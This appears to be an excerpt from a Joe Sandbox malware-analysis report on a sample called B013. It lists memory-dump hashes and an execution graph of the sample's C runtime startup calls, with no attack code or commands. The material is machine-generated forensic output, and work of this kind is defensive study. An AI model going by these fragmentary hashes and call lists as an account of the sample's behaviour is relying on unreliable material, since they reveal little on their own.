                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bfe942e484167e4a41aad086faa9fa26b8435484956866dab439b018aad6472f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bd2efa027539d32a0b4e5fcae74d9db69db3b748acc41f90daf3296a5b4f7e83
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfe942e484167e4a41aad086faa9fa26b8435484956866dab439b018aad6472f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5F0397496931ACFDF249F61C9597AEBA71AF46305F102899C0067A241CBB04994CB56
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1efe297deed911a4884f6fe70102545f2e303eed44c7cdcfa9af6d12283e695e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1fba75f857dff1cc3fe997ade23cff354e6dabad0411b3f18d0d19b07bf7e83f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1efe297deed911a4884f6fe70102545f2e303eed44c7cdcfa9af6d12283e695e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFE0DF74C2A248EBCB10EFB4E5002ACBFB4FF42301F5040AAE48412380D7354991CB92
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b30fa950e2f70f6111d22ec9f18d62149f00a37adf1b7e85a50d3b11c91801fd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0a4357346c819059b5410dad8c938c72eb202f068726b14dea11146aefbbfdda
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b30fa950e2f70f6111d22ec9f18d62149f00a37adf1b7e85a50d3b11c91801fd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3BE04FB0915219EFCB00EFA8D6556ADB7B8EF86301F504699D809972A0DBB11E449B50
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 86db5e7a897a1abe9c8014df695458889f3d95478aeb47638051d1a14a7bad17
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0fb280eeeaa2a07150db9f8f62468b9b8838baf05f18ad7759d0fedf8785d2e7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86db5e7a897a1abe9c8014df695458889f3d95478aeb47638051d1a14a7bad17
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04E0CD3260D7944FC309DB5DE4211C937A1BFC935070840FFC005C736AD9205C059371
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 06cc8641556c9298910df618650faadd1e3443590270e15e6928e09f368f9f0f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 608b7fb9f9a5475ee2fd0fd49acbbd8844ba0019b1e6572ec91c2f08128f26e7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06cc8641556c9298910df618650faadd1e3443590270e15e6928e09f368f9f0f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8E0C2B296B005EFDB12CBA4D491FB93B759B42311F109198E80C13651E7740910DB90
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9997b0a24190b09d630447f50ab6767f9f3783a1e812dbb3dfe787fbc81168e6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f3c4c8b49c9e31911afc135bd9bbb5ed48b41b49ed51d43ab2f796dad10abeea
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9997b0a24190b09d630447f50ab6767f9f3783a1e812dbb3dfe787fbc81168e6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45D01774A66209EBCB50DFA8A9486AE7AFDEB09300F104494A90993201D6724A509791
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a7e81d0b754c85761977b322cd0d000349572d0384e54d1bafd021e97c006b2f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 37bc42a1d9de81103601df4d89166751b0110f67a0f026f4df8f1ef3a644b8c4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7e81d0b754c85761977b322cd0d000349572d0384e54d1bafd021e97c006b2f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6E08C70825248EFCB94EFB8E8406ECBBB4AB04300F5040E8980893300E7314A80CB40
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bcb2b16e06568a94a722f70acf036c161177c38b29c9d02bebc7dd8aa985cb74
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 44f4837c667148e161f1a211c244201997f4d02033599565421af5070c5754a9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcb2b16e06568a94a722f70acf036c161177c38b29c9d02bebc7dd8aa985cb74
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CD05E70976208EBCB40DFA895486AD7BFCEB09300F004494E909C3201D7710A10D780
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ef7585a30db1ed6f56761f52289549aa9f47b3a786880f3446aa4beb375c2e8f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1d83e58d9402618570a62ceebceaf8ca7e7874b9ca2de5429103ae6379eba87d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef7585a30db1ed6f56761f52289549aa9f47b3a786880f3446aa4beb375c2e8f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29E0173482A248EBCB14EFB4A5442ACBFB8BB06302F9001EAE84416340DB754A90DB91
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b55727a4fd10e1b20fed4bfd8d1be52c410d66090f9327c658c68c607489d5a8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 753195216a3c8bab11f99adc638551ec3aa607002fb96787f917b36046ed6116
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b55727a4fd10e1b20fed4bfd8d1be52c410d66090f9327c658c68c607489d5a8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7ED0A9306AB109EBCB00DFA89400FBA7AACAB06340F401098A80823210AB700A10D290
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1eae3cf8661c30b961a4879ad35fb880f0ff17e1d34e57beb01ceed62d6c34da
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 48776927ca87eb11e33a93d101d75f2ce7c04f6b6ce2bc735bc845d73a76b7b2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eae3cf8661c30b961a4879ad35fb880f0ff17e1d34e57beb01ceed62d6c34da
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47D0C770A1A2405FC347CB3CD9566517FE1EB4A24070944E5E450CF716D325F9A5E762
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 387a4959e8428f84503cd508ff06848057e2e5227b1b805a94a78c89f6aaa806
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bfe314f6bb669b4b512d575ce0f4e8bda9346ff8e5687b6b152ccb1ceff8f6b5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 387a4959e8428f84503cd508ff06848057e2e5227b1b805a94a78c89f6aaa806
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42D012372241085F4F41EBD5E800D5777DCBB54700700C032F948CB531EA32E424E751
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7f11caac62ddaa216e4631f1d1c5ca16f0a21f234f0fb28f6401ae8b45d185b7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9eb077e140dce0502c7d2d62eecf0a6e215ead5af9e65df0a07535a520990961
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f11caac62ddaa216e4631f1d1c5ca16f0a21f234f0fb28f6401ae8b45d185b7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07D06C31811719DBCB12CEA0C6002EEB7B7AF46305F614495A90A3F200CAB22B4A8F90
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 471b580e9494fe69024fce57cda2ee1936f8e2596f70a4a1217190dca3fcc160
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 757354fb9568e164ad02fa5b54e3998073191a435d18d37ac5edb2688eb6c25d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 471b580e9494fe69024fce57cda2ee1936f8e2596f70a4a1217190dca3fcc160
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5D06770D0531DCADB28CBA9C4187ACB7B2BF85309F64846AD01AAA298C7758989CB51
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b2d8481a9721ed4b83fc6568892ac6568f7611aa0fd8263f5aeaea6eecbc5a3c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 18ca6fb33c067c0c91a80b5927e8bbf95e37f1792cec7f9955053d45e4991bb6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2d8481a9721ed4b83fc6568892ac6568f7611aa0fd8263f5aeaea6eecbc5a3c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8C19D74E01218CFDB58DFA9D990A9DBBB2FF89300F1084AAD419AB364DB345D86CF51
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4f848f4d97522310b47dc39016f2f7f15d39a1a2096e4e99fd33258e3adf35f6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 022375e520bc239ec788aa37675145eb3435e736176a09bfca3e1171d2a64d30
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f848f4d97522310b47dc39016f2f7f15d39a1a2096e4e99fd33258e3adf35f6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72C19D74E01218CFDB58DFA9D990A9DBBB2FF89300F1084AAD419AB364DB345D86CF51
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                  Execution Coverage:8.4%
                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:42.6%
                                                                                                                                                                                                                                                                                                                                  Signature Coverage:2.4%
                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:702
                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:14
                                                                                                                                                                                                                                                                                                                                  execution_graph 23259 6164e0 6 API calls 3 library calls 22741 404043 22742 404054 22741->22742 22776 4054f9 HeapCreate 22742->22776 22745 404092 22778 40536c GetModuleHandleW 22745->22778 22749 4040a3 __RTC_Initialize 22812 404cbc 22749->22812 22752 4040b2 22753 4040be GetCommandLineA 22752->22753 22888 404205 66 API calls 3 library calls 22752->22888 22827 404b85 22753->22827 22756 4040bd 22756->22753 22760 4040e3 22864 404852 22760->22864 22764 4040f4 22879 4042c4 22764->22879 22767 4040fc 22768 404107 22767->22768 22891 404205 66 API calls 3 library calls 22767->22891 22885 403520 FreeConsole 22768->22885 22771 404124 22772 404136 22771->22772 22892 404475 66 API calls _doexit 22771->22892 22893 4044a1 66 API calls _doexit 22772->22893 22775 40413b __mtinitlocknum 22777 404086 22776->22777 22777->22745 22886 404000 66 API calls 3 library calls 22777->22886 22779 405380 22778->22779 22780 405387 22778->22780 22894 4041d5 Sleep GetModuleHandleW 22779->22894 22782 405391 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 22780->22782 22783 4054ef 22780->22783 22785 4053da TlsAlloc 22782->22785 22916 405086 69 API calls 2 library calls 22783->22916 22784 405386 22784->22780 22788 404098 22785->22788 22789 405428 TlsSetValue 22785->22789 22788->22749 22887 404000 66 API calls 3 library calls 22788->22887 22789->22788 22790 405439 22789->22790 22895 4044bf 6 API calls 4 library calls 22790->22895 22792 40543e 22896 404f5c TlsGetValue 22792->22896 22795 404f5c __encode_pointer 6 API calls 22796 405459 22795->22796 22797 404f5c __encode_pointer 6 API calls 22796->22797 22798 405469 22797->22798 22799 404f5c __encode_pointer 6 API calls 22798->22799 22800 405479 22799->22800 22906 4057fc InitializeCriticalSectionAndSpinCount __mtinitlocknum 22800->22906 22802 405486 22802->22783 22907 404fd7 6 API calls __crt_waiting_on_module_handle 22802->22907 22804 40549a 22804->22783 22908 406591 22804->22908 22808 4054cd 22808->22783 22809 4054d4 22808->22809 22915 4050c3 66 API calls 5 library calls 22809->22915 22811 4054dc GetCurrentThreadId 22811->22788 22937 40552c 22812->22937 22814 404cc8 GetStartupInfoA 22815 406591 __calloc_crt 66 API calls 22814->22815 22818 404ce9 22815->22818 22816 404f07 __mtinitlocknum 22816->22752 22817 404dd1 22817->22816 22820 404e4e 22817->22820 22824 404dfa GetFileType 22817->22824 22938 40604c InitializeCriticalSectionAndSpinCount __mtinitlocknum 22817->22938 22818->22816 22818->22817 22818->22820 22821 406591 __calloc_crt 66 API calls 22818->22821 22819 404e84 GetStdHandle 22819->22820 22820->22816 22820->22819 22822 404ee9 SetHandleCount 22820->22822 22823 404e96 GetFileType 22820->22823 22939 40604c InitializeCriticalSectionAndSpinCount __mtinitlocknum 22820->22939 22821->22818 22822->22816 22823->22820 22824->22817 22828 404bc2 22827->22828 22829 404ba3 GetEnvironmentStringsW 22827->22829 22831 404bab 22828->22831 22832 404c5b 22828->22832 22830 404bb7 GetLastError 22829->22830 22829->22831 22830->22828 22833 404bde GetEnvironmentStringsW 22831->22833 22836 404bed 22831->22836 22834 404c64 GetEnvironmentStrings 22832->22834 22837 4040ce 22832->22837 22833->22836 22833->22837 22834->22837 22838 404c74 22834->22838 22835 404c02 WideCharToMultiByte 22839 404c50 FreeEnvironmentStringsW 22835->22839 22840 404c21 22835->22840 22836->22835 22836->22836 22853 404aca 22837->22853 22841 40654c __malloc_crt 66 API calls 22838->22841 22839->22837 22940 40654c 22840->22940 22843 404c8e 22841->22843 22845 404ca1 22843->22845 22846 404c95 FreeEnvironmentStringsA 22843->22846 22947 406e00 __VEC_memcpy 22845->22947 22846->22837 22847 404c2f WideCharToMultiByte 22849 404c41 22847->22849 22850 404c49 22847->22850 22946 4064be 66 API calls 5 library calls 22849->22946 22850->22839 22851 404cab FreeEnvironmentStringsA 22851->22837 22854 404ae4 GetModuleFileNameA 22853->22854 22855 404adf 22853->22855 22857 404b0b 22854->22857 22981 406d77 22855->22981 22975 404930 22857->22975 22859 4040d8 22859->22760 22889 404205 66 API calls 3 library calls 22859->22889 22861 40654c __malloc_crt 66 API calls 22862 404b4d 22861->22862 22862->22859 22863 404930 _parse_cmdline 76 API calls 22862->22863 22863->22859 22865 40485b 22864->22865 22867 404860 _strlen 22864->22867 22866 406d77 ___initmbctable 110 API calls 22865->22866 22866->22867 22868 406591 __calloc_crt 66 API calls 22867->22868 22871 4040e9 22867->22871 22874 404895 _strlen 22868->22874 22869 4048f3 23213 4064be 66 API calls 5 library calls 22869->23213 22871->22764 22890 404205 66 API calls 3 library calls 22871->22890 22872 406591 __calloc_crt 66 API calls 22872->22874 22873 404919 23214 4064be 66 API calls 5 library calls 22873->23214 22874->22869 22874->22871 22874->22872 22874->22873 22877 4048da 22874->22877 23211 40640b 66 API calls 2 library calls 22874->23211 22877->22874 23212 4059ba 10 API calls 3 library calls 22877->23212 22880 4042d2 __IsNonwritableInCurrentImage 22879->22880 23215 405c9b 22880->23215 22882 4042f0 __initterm_e 22884 40430f __IsNonwritableInCurrentImage __initterm 22882->22884 23219 405c84 74 API calls __cinit 22882->23219 22884->22767 22885->22771 22886->22745 22887->22749 22888->22756 22889->22760 22890->22764 22891->22768 22892->22772 22893->22775 22894->22784 22895->22792 22897 404f74 22896->22897 22898 404f95 GetModuleHandleW 22896->22898 22897->22898 22899 404f7e TlsGetValue 22897->22899 22900 404fb0 GetProcAddress 22898->22900 22901 404fa5 22898->22901 22905 404f89 22899->22905 22904 404f8d 22900->22904 22917 4041d5 Sleep GetModuleHandleW 22901->22917 22903 404fab 22903->22900 22903->22904 22904->22795 22905->22898 22905->22904 22906->22802 22907->22804 22910 40659a 22908->22910 22911 4054b3 22910->22911 22912 4065b8 Sleep 22910->22912 22918 40843f 22910->22918 22911->22783 22914 404fd7 6 API calls __crt_waiting_on_module_handle 22911->22914 22913 4065cd 22912->22913 22913->22910 22913->22911 22914->22808 22915->22811 22916->22788 22917->22903 22919 40844b __mtinitlocknum 22918->22919 22920 408463 22919->22920 22928 408482 _memset 22919->22928 22931 405b4a 66 API calls __getptd_noexit 22920->22931 22922 408468 22932 405ae2 6 API calls 2 library calls 22922->22932 22924 4084f4 RtlAllocateHeap 22924->22928 22927 408478 __mtinitlocknum 22927->22910 22928->22924 22928->22927 22933 405978 66 API calls 2 library calls 22928->22933 22934 407c69 5 API calls 2 library calls 22928->22934 22935 40853b LeaveCriticalSection _doexit 22928->22935 22936 4060bb 6 API calls __decode_pointer 22928->22936 22931->22922 22933->22928 22934->22928 22935->22928 22936->22928 22937->22814 22938->22817 22939->22820 22942 406555 22940->22942 22943 404c27 22942->22943 22944 40656c Sleep 22942->22944 22948 408375 22942->22948 22943->22839 22943->22847 22945 406581 22944->22945 22945->22942 22945->22943 22946->22850 22947->22851 22949 408428 22948->22949 22959 408387 22948->22959 22973 4060bb 6 API calls __decode_pointer 22949->22973 22951 40842e 22974 405b4a 66 API calls __getptd_noexit 22951->22974 22956 4083e4 RtlAllocateHeap 22956->22959 22957 408398 22957->22959 22966 4046b8 66 API calls 2 library calls 22957->22966 22967 40450d 66 API calls 7 library calls 22957->22967 22968 404259 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 22957->22968 22959->22956 22959->22957 22960 408414 22959->22960 22963 408419 22959->22963 22965 408420 22959->22965 22969 408326 66 API calls 4 library calls 22959->22969 22970 4060bb 6 API calls __decode_pointer 22959->22970 22971 405b4a 66 API calls __getptd_noexit 22960->22971 22972 405b4a 66 API calls __getptd_noexit 22963->22972 22965->22942 22966->22957 22967->22957 22969->22959 22970->22959 22971->22963 22972->22965 22973->22951 22974->22965 22977 40494f 22975->22977 22980 4049bc 22977->22980 22985 406de8 76 